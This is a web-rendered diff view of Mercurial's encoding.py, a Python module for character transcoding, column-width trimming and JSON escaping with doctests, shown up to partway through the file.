##// END OF EJS Templates
py3: make encoding.strio() an identity function on Python 2...
Yuya Nishihara -
r33852:f18b1153 default
parent child Browse files
Show More
@@ -1,589 +1,591 b''
1 # encoding.py - character transcoding support for Mercurial
1 # encoding.py - character transcoding support for Mercurial
2 #
2 #
3 # Copyright 2005-2009 Matt Mackall <mpm@selenic.com> and others
3 # Copyright 2005-2009 Matt Mackall <mpm@selenic.com> and others
4 #
4 #
5 # This software may be used and distributed according to the terms of the
5 # This software may be used and distributed according to the terms of the
6 # GNU General Public License version 2 or any later version.
6 # GNU General Public License version 2 or any later version.
7
7
8 from __future__ import absolute_import
8 from __future__ import absolute_import
9
9
10 import array
10 import array
11 import io
11 import io
12 import locale
12 import locale
13 import os
13 import os
14 import unicodedata
14 import unicodedata
15
15
16 from . import (
16 from . import (
17 error,
17 error,
18 policy,
18 policy,
19 pycompat,
19 pycompat,
20 )
20 )
21
21
22 charencode = policy.importmod(r'charencode')
22 charencode = policy.importmod(r'charencode')
23
23
24 asciilower = charencode.asciilower
24 asciilower = charencode.asciilower
25 asciiupper = charencode.asciiupper
25 asciiupper = charencode.asciiupper
26
26
27 _sysstr = pycompat.sysstr
27 _sysstr = pycompat.sysstr
28
28
29 if pycompat.ispy3:
29 if pycompat.ispy3:
30 unichr = chr
30 unichr = chr
31
31
32 # These unicode characters are ignored by HFS+ (Apple Technote 1150,
32 # These unicode characters are ignored by HFS+ (Apple Technote 1150,
33 # "Unicode Subtleties"), so we need to ignore them in some places for
33 # "Unicode Subtleties"), so we need to ignore them in some places for
34 # sanity.
34 # sanity.
35 _ignore = [unichr(int(x, 16)).encode("utf-8") for x in
35 _ignore = [unichr(int(x, 16)).encode("utf-8") for x in
36 "200c 200d 200e 200f 202a 202b 202c 202d 202e "
36 "200c 200d 200e 200f 202a 202b 202c 202d 202e "
37 "206a 206b 206c 206d 206e 206f feff".split()]
37 "206a 206b 206c 206d 206e 206f feff".split()]
38 # verify the next function will work
38 # verify the next function will work
39 assert all(i.startswith(("\xe2", "\xef")) for i in _ignore)
39 assert all(i.startswith(("\xe2", "\xef")) for i in _ignore)
40
40
41 def hfsignoreclean(s):
41 def hfsignoreclean(s):
42 """Remove codepoints ignored by HFS+ from s.
42 """Remove codepoints ignored by HFS+ from s.
43
43
44 >>> hfsignoreclean(u'.h\u200cg'.encode('utf-8'))
44 >>> hfsignoreclean(u'.h\u200cg'.encode('utf-8'))
45 '.hg'
45 '.hg'
46 >>> hfsignoreclean(u'.h\ufeffg'.encode('utf-8'))
46 >>> hfsignoreclean(u'.h\ufeffg'.encode('utf-8'))
47 '.hg'
47 '.hg'
48 """
48 """
49 if "\xe2" in s or "\xef" in s:
49 if "\xe2" in s or "\xef" in s:
50 for c in _ignore:
50 for c in _ignore:
51 s = s.replace(c, '')
51 s = s.replace(c, '')
52 return s
52 return s
53
53
54 # encoding.environ is provided read-only, which may not be used to modify
54 # encoding.environ is provided read-only, which may not be used to modify
55 # the process environment
55 # the process environment
56 _nativeenviron = (not pycompat.ispy3 or os.supports_bytes_environ)
56 _nativeenviron = (not pycompat.ispy3 or os.supports_bytes_environ)
57 if not pycompat.ispy3:
57 if not pycompat.ispy3:
58 environ = os.environ # re-exports
58 environ = os.environ # re-exports
59 elif _nativeenviron:
59 elif _nativeenviron:
60 environ = os.environb # re-exports
60 environ = os.environb # re-exports
61 else:
61 else:
62 # preferred encoding isn't known yet; use utf-8 to avoid unicode error
62 # preferred encoding isn't known yet; use utf-8 to avoid unicode error
63 # and recreate it once encoding is settled
63 # and recreate it once encoding is settled
64 environ = dict((k.encode(u'utf-8'), v.encode(u'utf-8'))
64 environ = dict((k.encode(u'utf-8'), v.encode(u'utf-8'))
65 for k, v in os.environ.items()) # re-exports
65 for k, v in os.environ.items()) # re-exports
66
66
67 _encodingfixers = {
67 _encodingfixers = {
68 '646': lambda: 'ascii',
68 '646': lambda: 'ascii',
69 'ANSI_X3.4-1968': lambda: 'ascii',
69 'ANSI_X3.4-1968': lambda: 'ascii',
70 }
70 }
71
71
72 try:
72 try:
73 encoding = environ.get("HGENCODING")
73 encoding = environ.get("HGENCODING")
74 if not encoding:
74 if not encoding:
75 encoding = locale.getpreferredencoding().encode('ascii') or 'ascii'
75 encoding = locale.getpreferredencoding().encode('ascii') or 'ascii'
76 encoding = _encodingfixers.get(encoding, lambda: encoding)()
76 encoding = _encodingfixers.get(encoding, lambda: encoding)()
77 except locale.Error:
77 except locale.Error:
78 encoding = 'ascii'
78 encoding = 'ascii'
79 encodingmode = environ.get("HGENCODINGMODE", "strict")
79 encodingmode = environ.get("HGENCODINGMODE", "strict")
80 fallbackencoding = 'ISO-8859-1'
80 fallbackencoding = 'ISO-8859-1'
81
81
82 class localstr(bytes):
82 class localstr(bytes):
83 '''This class allows strings that are unmodified to be
83 '''This class allows strings that are unmodified to be
84 round-tripped to the local encoding and back'''
84 round-tripped to the local encoding and back'''
85 def __new__(cls, u, l):
85 def __new__(cls, u, l):
86 s = bytes.__new__(cls, l)
86 s = bytes.__new__(cls, l)
87 s._utf8 = u
87 s._utf8 = u
88 return s
88 return s
89 def __hash__(self):
89 def __hash__(self):
90 return hash(self._utf8) # avoid collisions in local string space
90 return hash(self._utf8) # avoid collisions in local string space
91
91
92 def tolocal(s):
92 def tolocal(s):
93 """
93 """
94 Convert a string from internal UTF-8 to local encoding
94 Convert a string from internal UTF-8 to local encoding
95
95
96 All internal strings should be UTF-8 but some repos before the
96 All internal strings should be UTF-8 but some repos before the
97 implementation of locale support may contain latin1 or possibly
97 implementation of locale support may contain latin1 or possibly
98 other character sets. We attempt to decode everything strictly
98 other character sets. We attempt to decode everything strictly
99 using UTF-8, then Latin-1, and failing that, we use UTF-8 and
99 using UTF-8, then Latin-1, and failing that, we use UTF-8 and
100 replace unknown characters.
100 replace unknown characters.
101
101
102 The localstr class is used to cache the known UTF-8 encoding of
102 The localstr class is used to cache the known UTF-8 encoding of
103 strings next to their local representation to allow lossless
103 strings next to their local representation to allow lossless
104 round-trip conversion back to UTF-8.
104 round-trip conversion back to UTF-8.
105
105
106 >>> u = 'foo: \\xc3\\xa4' # utf-8
106 >>> u = 'foo: \\xc3\\xa4' # utf-8
107 >>> l = tolocal(u)
107 >>> l = tolocal(u)
108 >>> l
108 >>> l
109 'foo: ?'
109 'foo: ?'
110 >>> fromlocal(l)
110 >>> fromlocal(l)
111 'foo: \\xc3\\xa4'
111 'foo: \\xc3\\xa4'
112 >>> u2 = 'foo: \\xc3\\xa1'
112 >>> u2 = 'foo: \\xc3\\xa1'
113 >>> d = { l: 1, tolocal(u2): 2 }
113 >>> d = { l: 1, tolocal(u2): 2 }
114 >>> len(d) # no collision
114 >>> len(d) # no collision
115 2
115 2
116 >>> 'foo: ?' in d
116 >>> 'foo: ?' in d
117 False
117 False
118 >>> l1 = 'foo: \\xe4' # historical latin1 fallback
118 >>> l1 = 'foo: \\xe4' # historical latin1 fallback
119 >>> l = tolocal(l1)
119 >>> l = tolocal(l1)
120 >>> l
120 >>> l
121 'foo: ?'
121 'foo: ?'
122 >>> fromlocal(l) # magically in utf-8
122 >>> fromlocal(l) # magically in utf-8
123 'foo: \\xc3\\xa4'
123 'foo: \\xc3\\xa4'
124 """
124 """
125
125
126 try:
126 try:
127 try:
127 try:
128 # make sure string is actually stored in UTF-8
128 # make sure string is actually stored in UTF-8
129 u = s.decode('UTF-8')
129 u = s.decode('UTF-8')
130 if encoding == 'UTF-8':
130 if encoding == 'UTF-8':
131 # fast path
131 # fast path
132 return s
132 return s
133 r = u.encode(_sysstr(encoding), u"replace")
133 r = u.encode(_sysstr(encoding), u"replace")
134 if u == r.decode(_sysstr(encoding)):
134 if u == r.decode(_sysstr(encoding)):
135 # r is a safe, non-lossy encoding of s
135 # r is a safe, non-lossy encoding of s
136 return r
136 return r
137 return localstr(s, r)
137 return localstr(s, r)
138 except UnicodeDecodeError:
138 except UnicodeDecodeError:
139 # we should only get here if we're looking at an ancient changeset
139 # we should only get here if we're looking at an ancient changeset
140 try:
140 try:
141 u = s.decode(_sysstr(fallbackencoding))
141 u = s.decode(_sysstr(fallbackencoding))
142 r = u.encode(_sysstr(encoding), u"replace")
142 r = u.encode(_sysstr(encoding), u"replace")
143 if u == r.decode(_sysstr(encoding)):
143 if u == r.decode(_sysstr(encoding)):
144 # r is a safe, non-lossy encoding of s
144 # r is a safe, non-lossy encoding of s
145 return r
145 return r
146 return localstr(u.encode('UTF-8'), r)
146 return localstr(u.encode('UTF-8'), r)
147 except UnicodeDecodeError:
147 except UnicodeDecodeError:
148 u = s.decode("utf-8", "replace") # last ditch
148 u = s.decode("utf-8", "replace") # last ditch
149 # can't round-trip
149 # can't round-trip
150 return u.encode(_sysstr(encoding), u"replace")
150 return u.encode(_sysstr(encoding), u"replace")
151 except LookupError as k:
151 except LookupError as k:
152 raise error.Abort(k, hint="please check your locale settings")
152 raise error.Abort(k, hint="please check your locale settings")
153
153
154 def fromlocal(s):
154 def fromlocal(s):
155 """
155 """
156 Convert a string from the local character encoding to UTF-8
156 Convert a string from the local character encoding to UTF-8
157
157
158 We attempt to decode strings using the encoding mode set by
158 We attempt to decode strings using the encoding mode set by
159 HGENCODINGMODE, which defaults to 'strict'. In this mode, unknown
159 HGENCODINGMODE, which defaults to 'strict'. In this mode, unknown
160 characters will cause an error message. Other modes include
160 characters will cause an error message. Other modes include
161 'replace', which replaces unknown characters with a special
161 'replace', which replaces unknown characters with a special
162 Unicode character, and 'ignore', which drops the character.
162 Unicode character, and 'ignore', which drops the character.
163 """
163 """
164
164
165 # can we do a lossless round-trip?
165 # can we do a lossless round-trip?
166 if isinstance(s, localstr):
166 if isinstance(s, localstr):
167 return s._utf8
167 return s._utf8
168
168
169 try:
169 try:
170 u = s.decode(_sysstr(encoding), _sysstr(encodingmode))
170 u = s.decode(_sysstr(encoding), _sysstr(encodingmode))
171 return u.encode("utf-8")
171 return u.encode("utf-8")
172 except UnicodeDecodeError as inst:
172 except UnicodeDecodeError as inst:
173 sub = s[max(0, inst.start - 10):inst.start + 10]
173 sub = s[max(0, inst.start - 10):inst.start + 10]
174 raise error.Abort("decoding near '%s': %s!" % (sub, inst))
174 raise error.Abort("decoding near '%s': %s!" % (sub, inst))
175 except LookupError as k:
175 except LookupError as k:
176 raise error.Abort(k, hint="please check your locale settings")
176 raise error.Abort(k, hint="please check your locale settings")
177
177
178 def unitolocal(u):
178 def unitolocal(u):
179 """Convert a unicode string to a byte string of local encoding"""
179 """Convert a unicode string to a byte string of local encoding"""
180 return tolocal(u.encode('utf-8'))
180 return tolocal(u.encode('utf-8'))
181
181
182 def unifromlocal(s):
182 def unifromlocal(s):
183 """Convert a byte string of local encoding to a unicode string"""
183 """Convert a byte string of local encoding to a unicode string"""
184 return fromlocal(s).decode('utf-8')
184 return fromlocal(s).decode('utf-8')
185
185
186 def unimethod(bytesfunc):
186 def unimethod(bytesfunc):
187 """Create a proxy method that forwards __unicode__() and __str__() of
187 """Create a proxy method that forwards __unicode__() and __str__() of
188 Python 3 to __bytes__()"""
188 Python 3 to __bytes__()"""
189 def unifunc(obj):
189 def unifunc(obj):
190 return unifromlocal(bytesfunc(obj))
190 return unifromlocal(bytesfunc(obj))
191 return unifunc
191 return unifunc
192
192
193 # converter functions between native str and byte string. use these if the
193 # converter functions between native str and byte string. use these if the
194 # character encoding is not aware (e.g. exception message) or is known to
194 # character encoding is not aware (e.g. exception message) or is known to
195 # be locale dependent (e.g. date formatting.)
195 # be locale dependent (e.g. date formatting.)
196 if pycompat.ispy3:
196 if pycompat.ispy3:
197 strtolocal = unitolocal
197 strtolocal = unitolocal
198 strfromlocal = unifromlocal
198 strfromlocal = unifromlocal
199 strmethod = unimethod
199 strmethod = unimethod
200 else:
200 else:
201 strtolocal = pycompat.identity
201 strtolocal = pycompat.identity
202 strfromlocal = pycompat.identity
202 strfromlocal = pycompat.identity
203 strmethod = pycompat.identity
203 strmethod = pycompat.identity
204
204
205 if not _nativeenviron:
205 if not _nativeenviron:
206 # now encoding and helper functions are available, recreate the environ
206 # now encoding and helper functions are available, recreate the environ
207 # dict to be exported to other modules
207 # dict to be exported to other modules
208 environ = dict((tolocal(k.encode(u'utf-8')), tolocal(v.encode(u'utf-8')))
208 environ = dict((tolocal(k.encode(u'utf-8')), tolocal(v.encode(u'utf-8')))
209 for k, v in os.environ.items()) # re-exports
209 for k, v in os.environ.items()) # re-exports
210
210
211 # How to treat ambiguous-width characters. Set to 'wide' to treat as wide.
211 # How to treat ambiguous-width characters. Set to 'wide' to treat as wide.
212 _wide = _sysstr(environ.get("HGENCODINGAMBIGUOUS", "narrow") == "wide"
212 _wide = _sysstr(environ.get("HGENCODINGAMBIGUOUS", "narrow") == "wide"
213 and "WFA" or "WF")
213 and "WFA" or "WF")
214
214
215 def colwidth(s):
215 def colwidth(s):
216 "Find the column width of a string for display in the local encoding"
216 "Find the column width of a string for display in the local encoding"
217 return ucolwidth(s.decode(_sysstr(encoding), u'replace'))
217 return ucolwidth(s.decode(_sysstr(encoding), u'replace'))
218
218
219 def ucolwidth(d):
219 def ucolwidth(d):
220 "Find the column width of a Unicode string for display"
220 "Find the column width of a Unicode string for display"
221 eaw = getattr(unicodedata, 'east_asian_width', None)
221 eaw = getattr(unicodedata, 'east_asian_width', None)
222 if eaw is not None:
222 if eaw is not None:
223 return sum([eaw(c) in _wide and 2 or 1 for c in d])
223 return sum([eaw(c) in _wide and 2 or 1 for c in d])
224 return len(d)
224 return len(d)
225
225
226 def getcols(s, start, c):
226 def getcols(s, start, c):
227 '''Use colwidth to find a c-column substring of s starting at byte
227 '''Use colwidth to find a c-column substring of s starting at byte
228 index start'''
228 index start'''
229 for x in xrange(start + c, len(s)):
229 for x in xrange(start + c, len(s)):
230 t = s[start:x]
230 t = s[start:x]
231 if colwidth(t) == c:
231 if colwidth(t) == c:
232 return t
232 return t
233
233
234 def trim(s, width, ellipsis='', leftside=False):
234 def trim(s, width, ellipsis='', leftside=False):
235 """Trim string 's' to at most 'width' columns (including 'ellipsis').
235 """Trim string 's' to at most 'width' columns (including 'ellipsis').
236
236
237 If 'leftside' is True, left side of string 's' is trimmed.
237 If 'leftside' is True, left side of string 's' is trimmed.
238 'ellipsis' is always placed at trimmed side.
238 'ellipsis' is always placed at trimmed side.
239
239
240 >>> ellipsis = '+++'
240 >>> ellipsis = '+++'
241 >>> from . import encoding
241 >>> from . import encoding
242 >>> encoding.encoding = 'utf-8'
242 >>> encoding.encoding = 'utf-8'
243 >>> t= '1234567890'
243 >>> t= '1234567890'
244 >>> print trim(t, 12, ellipsis=ellipsis)
244 >>> print trim(t, 12, ellipsis=ellipsis)
245 1234567890
245 1234567890
246 >>> print trim(t, 10, ellipsis=ellipsis)
246 >>> print trim(t, 10, ellipsis=ellipsis)
247 1234567890
247 1234567890
248 >>> print trim(t, 8, ellipsis=ellipsis)
248 >>> print trim(t, 8, ellipsis=ellipsis)
249 12345+++
249 12345+++
250 >>> print trim(t, 8, ellipsis=ellipsis, leftside=True)
250 >>> print trim(t, 8, ellipsis=ellipsis, leftside=True)
251 +++67890
251 +++67890
252 >>> print trim(t, 8)
252 >>> print trim(t, 8)
253 12345678
253 12345678
254 >>> print trim(t, 8, leftside=True)
254 >>> print trim(t, 8, leftside=True)
255 34567890
255 34567890
256 >>> print trim(t, 3, ellipsis=ellipsis)
256 >>> print trim(t, 3, ellipsis=ellipsis)
257 +++
257 +++
258 >>> print trim(t, 1, ellipsis=ellipsis)
258 >>> print trim(t, 1, ellipsis=ellipsis)
259 +
259 +
260 >>> u = u'\u3042\u3044\u3046\u3048\u304a' # 2 x 5 = 10 columns
260 >>> u = u'\u3042\u3044\u3046\u3048\u304a' # 2 x 5 = 10 columns
261 >>> t = u.encode(encoding.encoding)
261 >>> t = u.encode(encoding.encoding)
262 >>> print trim(t, 12, ellipsis=ellipsis)
262 >>> print trim(t, 12, ellipsis=ellipsis)
263 \xe3\x81\x82\xe3\x81\x84\xe3\x81\x86\xe3\x81\x88\xe3\x81\x8a
263 \xe3\x81\x82\xe3\x81\x84\xe3\x81\x86\xe3\x81\x88\xe3\x81\x8a
264 >>> print trim(t, 10, ellipsis=ellipsis)
264 >>> print trim(t, 10, ellipsis=ellipsis)
265 \xe3\x81\x82\xe3\x81\x84\xe3\x81\x86\xe3\x81\x88\xe3\x81\x8a
265 \xe3\x81\x82\xe3\x81\x84\xe3\x81\x86\xe3\x81\x88\xe3\x81\x8a
266 >>> print trim(t, 8, ellipsis=ellipsis)
266 >>> print trim(t, 8, ellipsis=ellipsis)
267 \xe3\x81\x82\xe3\x81\x84+++
267 \xe3\x81\x82\xe3\x81\x84+++
268 >>> print trim(t, 8, ellipsis=ellipsis, leftside=True)
268 >>> print trim(t, 8, ellipsis=ellipsis, leftside=True)
269 +++\xe3\x81\x88\xe3\x81\x8a
269 +++\xe3\x81\x88\xe3\x81\x8a
270 >>> print trim(t, 5)
270 >>> print trim(t, 5)
271 \xe3\x81\x82\xe3\x81\x84
271 \xe3\x81\x82\xe3\x81\x84
272 >>> print trim(t, 5, leftside=True)
272 >>> print trim(t, 5, leftside=True)
273 \xe3\x81\x88\xe3\x81\x8a
273 \xe3\x81\x88\xe3\x81\x8a
274 >>> print trim(t, 4, ellipsis=ellipsis)
274 >>> print trim(t, 4, ellipsis=ellipsis)
275 +++
275 +++
276 >>> print trim(t, 4, ellipsis=ellipsis, leftside=True)
276 >>> print trim(t, 4, ellipsis=ellipsis, leftside=True)
277 +++
277 +++
278 >>> t = '\x11\x22\x33\x44\x55\x66\x77\x88\x99\xaa' # invalid byte sequence
278 >>> t = '\x11\x22\x33\x44\x55\x66\x77\x88\x99\xaa' # invalid byte sequence
279 >>> print trim(t, 12, ellipsis=ellipsis)
279 >>> print trim(t, 12, ellipsis=ellipsis)
280 \x11\x22\x33\x44\x55\x66\x77\x88\x99\xaa
280 \x11\x22\x33\x44\x55\x66\x77\x88\x99\xaa
281 >>> print trim(t, 10, ellipsis=ellipsis)
281 >>> print trim(t, 10, ellipsis=ellipsis)
282 \x11\x22\x33\x44\x55\x66\x77\x88\x99\xaa
282 \x11\x22\x33\x44\x55\x66\x77\x88\x99\xaa
283 >>> print trim(t, 8, ellipsis=ellipsis)
283 >>> print trim(t, 8, ellipsis=ellipsis)
284 \x11\x22\x33\x44\x55+++
284 \x11\x22\x33\x44\x55+++
285 >>> print trim(t, 8, ellipsis=ellipsis, leftside=True)
285 >>> print trim(t, 8, ellipsis=ellipsis, leftside=True)
286 +++\x66\x77\x88\x99\xaa
286 +++\x66\x77\x88\x99\xaa
287 >>> print trim(t, 8)
287 >>> print trim(t, 8)
288 \x11\x22\x33\x44\x55\x66\x77\x88
288 \x11\x22\x33\x44\x55\x66\x77\x88
289 >>> print trim(t, 8, leftside=True)
289 >>> print trim(t, 8, leftside=True)
290 \x33\x44\x55\x66\x77\x88\x99\xaa
290 \x33\x44\x55\x66\x77\x88\x99\xaa
291 >>> print trim(t, 3, ellipsis=ellipsis)
291 >>> print trim(t, 3, ellipsis=ellipsis)
292 +++
292 +++
293 >>> print trim(t, 1, ellipsis=ellipsis)
293 >>> print trim(t, 1, ellipsis=ellipsis)
294 +
294 +
295 """
295 """
296 try:
296 try:
297 u = s.decode(_sysstr(encoding))
297 u = s.decode(_sysstr(encoding))
298 except UnicodeDecodeError:
298 except UnicodeDecodeError:
299 if len(s) <= width: # trimming is not needed
299 if len(s) <= width: # trimming is not needed
300 return s
300 return s
301 width -= len(ellipsis)
301 width -= len(ellipsis)
302 if width <= 0: # no enough room even for ellipsis
302 if width <= 0: # no enough room even for ellipsis
303 return ellipsis[:width + len(ellipsis)]
303 return ellipsis[:width + len(ellipsis)]
304 if leftside:
304 if leftside:
305 return ellipsis + s[-width:]
305 return ellipsis + s[-width:]
306 return s[:width] + ellipsis
306 return s[:width] + ellipsis
307
307
308 if ucolwidth(u) <= width: # trimming is not needed
308 if ucolwidth(u) <= width: # trimming is not needed
309 return s
309 return s
310
310
311 width -= len(ellipsis)
311 width -= len(ellipsis)
312 if width <= 0: # no enough room even for ellipsis
312 if width <= 0: # no enough room even for ellipsis
313 return ellipsis[:width + len(ellipsis)]
313 return ellipsis[:width + len(ellipsis)]
314
314
315 if leftside:
315 if leftside:
316 uslice = lambda i: u[i:]
316 uslice = lambda i: u[i:]
317 concat = lambda s: ellipsis + s
317 concat = lambda s: ellipsis + s
318 else:
318 else:
319 uslice = lambda i: u[:-i]
319 uslice = lambda i: u[:-i]
320 concat = lambda s: s + ellipsis
320 concat = lambda s: s + ellipsis
321 for i in xrange(1, len(u)):
321 for i in xrange(1, len(u)):
322 usub = uslice(i)
322 usub = uslice(i)
323 if ucolwidth(usub) <= width:
323 if ucolwidth(usub) <= width:
324 return concat(usub.encode(_sysstr(encoding)))
324 return concat(usub.encode(_sysstr(encoding)))
325 return ellipsis # no enough room for multi-column characters
325 return ellipsis # no enough room for multi-column characters
326
326
327 def lower(s):
327 def lower(s):
328 "best-effort encoding-aware case-folding of local string s"
328 "best-effort encoding-aware case-folding of local string s"
329 try:
329 try:
330 return asciilower(s)
330 return asciilower(s)
331 except UnicodeDecodeError:
331 except UnicodeDecodeError:
332 pass
332 pass
333 try:
333 try:
334 if isinstance(s, localstr):
334 if isinstance(s, localstr):
335 u = s._utf8.decode("utf-8")
335 u = s._utf8.decode("utf-8")
336 else:
336 else:
337 u = s.decode(_sysstr(encoding), _sysstr(encodingmode))
337 u = s.decode(_sysstr(encoding), _sysstr(encodingmode))
338
338
339 lu = u.lower()
339 lu = u.lower()
340 if u == lu:
340 if u == lu:
341 return s # preserve localstring
341 return s # preserve localstring
342 return lu.encode(_sysstr(encoding))
342 return lu.encode(_sysstr(encoding))
343 except UnicodeError:
343 except UnicodeError:
344 return s.lower() # we don't know how to fold this except in ASCII
344 return s.lower() # we don't know how to fold this except in ASCII
345 except LookupError as k:
345 except LookupError as k:
346 raise error.Abort(k, hint="please check your locale settings")
346 raise error.Abort(k, hint="please check your locale settings")
347
347
348 def upper(s):
348 def upper(s):
349 "best-effort encoding-aware case-folding of local string s"
349 "best-effort encoding-aware case-folding of local string s"
350 try:
350 try:
351 return asciiupper(s)
351 return asciiupper(s)
352 except UnicodeDecodeError:
352 except UnicodeDecodeError:
353 return upperfallback(s)
353 return upperfallback(s)
354
354
355 def upperfallback(s):
355 def upperfallback(s):
356 try:
356 try:
357 if isinstance(s, localstr):
357 if isinstance(s, localstr):
358 u = s._utf8.decode("utf-8")
358 u = s._utf8.decode("utf-8")
359 else:
359 else:
360 u = s.decode(_sysstr(encoding), _sysstr(encodingmode))
360 u = s.decode(_sysstr(encoding), _sysstr(encodingmode))
361
361
362 uu = u.upper()
362 uu = u.upper()
363 if u == uu:
363 if u == uu:
364 return s # preserve localstring
364 return s # preserve localstring
365 return uu.encode(_sysstr(encoding))
365 return uu.encode(_sysstr(encoding))
366 except UnicodeError:
366 except UnicodeError:
367 return s.upper() # we don't know how to fold this except in ASCII
367 return s.upper() # we don't know how to fold this except in ASCII
368 except LookupError as k:
368 except LookupError as k:
369 raise error.Abort(k, hint="please check your locale settings")
369 raise error.Abort(k, hint="please check your locale settings")
370
370
371 class normcasespecs(object):
371 class normcasespecs(object):
372 '''what a platform's normcase does to ASCII strings
372 '''what a platform's normcase does to ASCII strings
373
373
374 This is specified per platform, and should be consistent with what normcase
374 This is specified per platform, and should be consistent with what normcase
375 on that platform actually does.
375 on that platform actually does.
376
376
377 lower: normcase lowercases ASCII strings
377 lower: normcase lowercases ASCII strings
378 upper: normcase uppercases ASCII strings
378 upper: normcase uppercases ASCII strings
379 other: the fallback function should always be called
379 other: the fallback function should always be called
380
380
381 This should be kept in sync with normcase_spec in util.h.'''
381 This should be kept in sync with normcase_spec in util.h.'''
382 lower = -1
382 lower = -1
383 upper = 1
383 upper = 1
384 other = 0
384 other = 0
385
385
386 _jsonmap = []
386 _jsonmap = []
387 _jsonmap.extend("\\u%04x" % x for x in range(32))
387 _jsonmap.extend("\\u%04x" % x for x in range(32))
388 _jsonmap.extend(pycompat.bytechr(x) for x in range(32, 127))
388 _jsonmap.extend(pycompat.bytechr(x) for x in range(32, 127))
389 _jsonmap.append('\\u007f')
389 _jsonmap.append('\\u007f')
390 _jsonmap[0x09] = '\\t'
390 _jsonmap[0x09] = '\\t'
391 _jsonmap[0x0a] = '\\n'
391 _jsonmap[0x0a] = '\\n'
392 _jsonmap[0x22] = '\\"'
392 _jsonmap[0x22] = '\\"'
393 _jsonmap[0x5c] = '\\\\'
393 _jsonmap[0x5c] = '\\\\'
394 _jsonmap[0x08] = '\\b'
394 _jsonmap[0x08] = '\\b'
395 _jsonmap[0x0c] = '\\f'
395 _jsonmap[0x0c] = '\\f'
396 _jsonmap[0x0d] = '\\r'
396 _jsonmap[0x0d] = '\\r'
397 _paranoidjsonmap = _jsonmap[:]
397 _paranoidjsonmap = _jsonmap[:]
398 _paranoidjsonmap[0x3c] = '\\u003c' # '<' (e.g. escape "</script>")
398 _paranoidjsonmap[0x3c] = '\\u003c' # '<' (e.g. escape "</script>")
399 _paranoidjsonmap[0x3e] = '\\u003e' # '>'
399 _paranoidjsonmap[0x3e] = '\\u003e' # '>'
400 _jsonmap.extend(pycompat.bytechr(x) for x in range(128, 256))
400 _jsonmap.extend(pycompat.bytechr(x) for x in range(128, 256))
401
401
402 def jsonescape(s, paranoid=False):
402 def jsonescape(s, paranoid=False):
403 '''returns a string suitable for JSON
403 '''returns a string suitable for JSON
404
404
405 JSON is problematic for us because it doesn't support non-Unicode
405 JSON is problematic for us because it doesn't support non-Unicode
406 bytes. To deal with this, we take the following approach:
406 bytes. To deal with this, we take the following approach:
407
407
408 - localstr objects are converted back to UTF-8
408 - localstr objects are converted back to UTF-8
409 - valid UTF-8/ASCII strings are passed as-is
409 - valid UTF-8/ASCII strings are passed as-is
410 - other strings are converted to UTF-8b surrogate encoding
410 - other strings are converted to UTF-8b surrogate encoding
411 - apply JSON-specified string escaping
411 - apply JSON-specified string escaping
412
412
413 (escapes are doubled in these tests)
413 (escapes are doubled in these tests)
414
414
415 >>> jsonescape('this is a test')
415 >>> jsonescape('this is a test')
416 'this is a test'
416 'this is a test'
417 >>> jsonescape('escape characters: \\0 \\x0b \\x7f')
417 >>> jsonescape('escape characters: \\0 \\x0b \\x7f')
418 'escape characters: \\\\u0000 \\\\u000b \\\\u007f'
418 'escape characters: \\\\u0000 \\\\u000b \\\\u007f'
419 >>> jsonescape('escape characters: \\t \\n \\r \\" \\\\')
419 >>> jsonescape('escape characters: \\t \\n \\r \\" \\\\')
420 'escape characters: \\\\t \\\\n \\\\r \\\\" \\\\\\\\'
420 'escape characters: \\\\t \\\\n \\\\r \\\\" \\\\\\\\'
421 >>> jsonescape('a weird byte: \\xdd')
421 >>> jsonescape('a weird byte: \\xdd')
422 'a weird byte: \\xed\\xb3\\x9d'
422 'a weird byte: \\xed\\xb3\\x9d'
423 >>> jsonescape('utf-8: caf\\xc3\\xa9')
423 >>> jsonescape('utf-8: caf\\xc3\\xa9')
424 'utf-8: caf\\xc3\\xa9'
424 'utf-8: caf\\xc3\\xa9'
425 >>> jsonescape('')
425 >>> jsonescape('')
426 ''
426 ''
427
427
428 If paranoid, non-ascii and common troublesome characters are also escaped.
428 If paranoid, non-ascii and common troublesome characters are also escaped.
429 This is suitable for web output.
429 This is suitable for web output.
430
430
431 >>> jsonescape('escape boundary: \\x7e \\x7f \\xc2\\x80', paranoid=True)
431 >>> jsonescape('escape boundary: \\x7e \\x7f \\xc2\\x80', paranoid=True)
432 'escape boundary: ~ \\\\u007f \\\\u0080'
432 'escape boundary: ~ \\\\u007f \\\\u0080'
433 >>> jsonescape('a weird byte: \\xdd', paranoid=True)
433 >>> jsonescape('a weird byte: \\xdd', paranoid=True)
434 'a weird byte: \\\\udcdd'
434 'a weird byte: \\\\udcdd'
435 >>> jsonescape('utf-8: caf\\xc3\\xa9', paranoid=True)
435 >>> jsonescape('utf-8: caf\\xc3\\xa9', paranoid=True)
436 'utf-8: caf\\\\u00e9'
436 'utf-8: caf\\\\u00e9'
437 >>> jsonescape('non-BMP: \\xf0\\x9d\\x84\\x9e', paranoid=True)
437 >>> jsonescape('non-BMP: \\xf0\\x9d\\x84\\x9e', paranoid=True)
438 'non-BMP: \\\\ud834\\\\udd1e'
438 'non-BMP: \\\\ud834\\\\udd1e'
439 >>> jsonescape('<foo@example.org>', paranoid=True)
439 >>> jsonescape('<foo@example.org>', paranoid=True)
440 '\\\\u003cfoo@example.org\\\\u003e'
440 '\\\\u003cfoo@example.org\\\\u003e'
441 '''
441 '''
442
442
443 if paranoid:
443 if paranoid:
444 jm = _paranoidjsonmap
444 jm = _paranoidjsonmap
445 else:
445 else:
446 jm = _jsonmap
446 jm = _jsonmap
447
447
448 u8chars = toutf8b(s)
448 u8chars = toutf8b(s)
449 try:
449 try:
450 return ''.join(jm[x] for x in bytearray(u8chars)) # fast path
450 return ''.join(jm[x] for x in bytearray(u8chars)) # fast path
451 except IndexError:
451 except IndexError:
452 pass
452 pass
453 # non-BMP char is represented as UTF-16 surrogate pair
453 # non-BMP char is represented as UTF-16 surrogate pair
454 u16codes = array.array('H', u8chars.decode('utf-8').encode('utf-16'))
454 u16codes = array.array('H', u8chars.decode('utf-8').encode('utf-16'))
455 u16codes.pop(0) # drop BOM
455 u16codes.pop(0) # drop BOM
456 return ''.join(jm[x] if x < 128 else '\\u%04x' % x for x in u16codes)
456 return ''.join(jm[x] if x < 128 else '\\u%04x' % x for x in u16codes)
457
457
458 _utf8len = [0, 0, 0, 0, 0, 0, 0, 0, 1, 1, 1, 1, 2, 2, 3, 4]
